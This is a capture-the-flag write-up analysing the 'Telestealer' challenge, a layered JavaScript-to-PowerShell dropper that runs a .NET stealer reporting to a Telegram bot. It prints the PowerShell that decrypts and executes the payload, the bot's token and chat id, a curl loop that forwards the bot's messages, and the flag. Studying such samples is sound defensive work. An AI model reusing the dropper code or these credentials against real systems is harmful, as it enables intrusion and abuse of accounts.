Huntress CTF 2025 - Telestealer malware challenge write up
Overview
| Challenge name | Telestealer |
|---|---|
| Solution author | Sudeep Singh |
| Category | Malware |
You can download the binary related to this challenge from here
Password for the archive is: telestealer
I scored a first blood on this challenge :)
In this challenge we are given a huge JavaScript file and there are multiple layers to be deobfuscated. The final binary dropped is a .NET-based information stealer that exfiltrates the stolen information to a Telegram bot using Telegram API.
Stage 1 - JavaScript
For stage 1 JavaScript, we can see that multiple base64-encoded strings are concatenated, then executed as an encoded command using PowerShell. We can dump this base64-encoded blob, decode it and analyse the next stage.
var parts = [];
parts.push('JGtle...2p0');
parts.push('M3g2V...xdFBZ');
...
var b64cmd = parts.join('');
Write.Echo(b64cmd);
Stage 2 - PowerShell
Below is the Stage 2 PowerShell script.
$key = [Convert]::FromBase64String('36YQbGeO5yMKil1bWgZb491TLXv68qdTc4dBLIIbdzw=')
$iv = [Convert]::FromBase64String('5g9YP4F0aHlBXK+G3DF5JA==')
$cipher = [Convert]::FromBase64String('4BA40iPA...qavj6g==')
$aes = [System.Security.Cryptography.Aes]::Create()
$aes.Key = $key
$aes.IV = $iv
$dec = $aes.CreateDecryptor()
$plain = $dec.TransformFinalBlock($cipher, 0, $cipher.Length)
$out = 'C:\Users\Public\Music\x.exe'
[IO.File]::WriteAllBytes($out, $plain)
Start-Process -FilePath $out
Below are the key functionalities of this script.
- Uses AES algorithm to decrypt the Base64-encoded and AES encrypted blob using the hardcoded key and IV.
- Writes the decrypted binary to
C:\Users\Public\Music\x.exeand executes it.
The decrypted file is a .NET binary.
Stage 3
This .NET binary is an information stealer that leverages Telegram to exfiltrate the stolen information to the threat actor controlled Telegram bot.
The screenshot below shows the relevant code section.
The bot token and the chat_id are configured as shown below.
private static string TG_Access = "8485770488:AAH8YOjqaRckDPIy7xNwZN2KcaLx6EME-L0";
// Token: 0x04000027 RID: 39
private static string TG_Profileid = "-4862820035";
We can retrieve information about the bot by querying the Telegram API
https://api.telegram.org/bot8485770488:AAH8YOjqaRckDPIy7xNwZN2KcaLx6EME-L0/getMe
{
"ok": true,
"result": {
"id": 8485770488,
"is_bot": true,
"first_name": "st3aler",
"username": "st38l3r_bot",
"can_join_groups": true,
"can_read_all_group_messages": true,
"supports_inline_queries": false,
"can_connect_to_business": false,
"has_main_web_app": false
}
}
To solve this challenge, I forwarded all the messages from this Telegram bot to my own account. One of those messages revealed the flag.
for i in `seq 1 100`; do sleep 2 && echo $i && curl "https://api.telegram.org/bot8485770488:AAH8YOjqaRckDPIy7xNwZN2KcaLx6EME-L0/forwardMessage?chat_id=<my_chat_id>&from_chat_id=-4862820035&message_id=$i"; done | tee -a log.txt
Flag is: flag{5f5b173825732f5404acf2f680057153}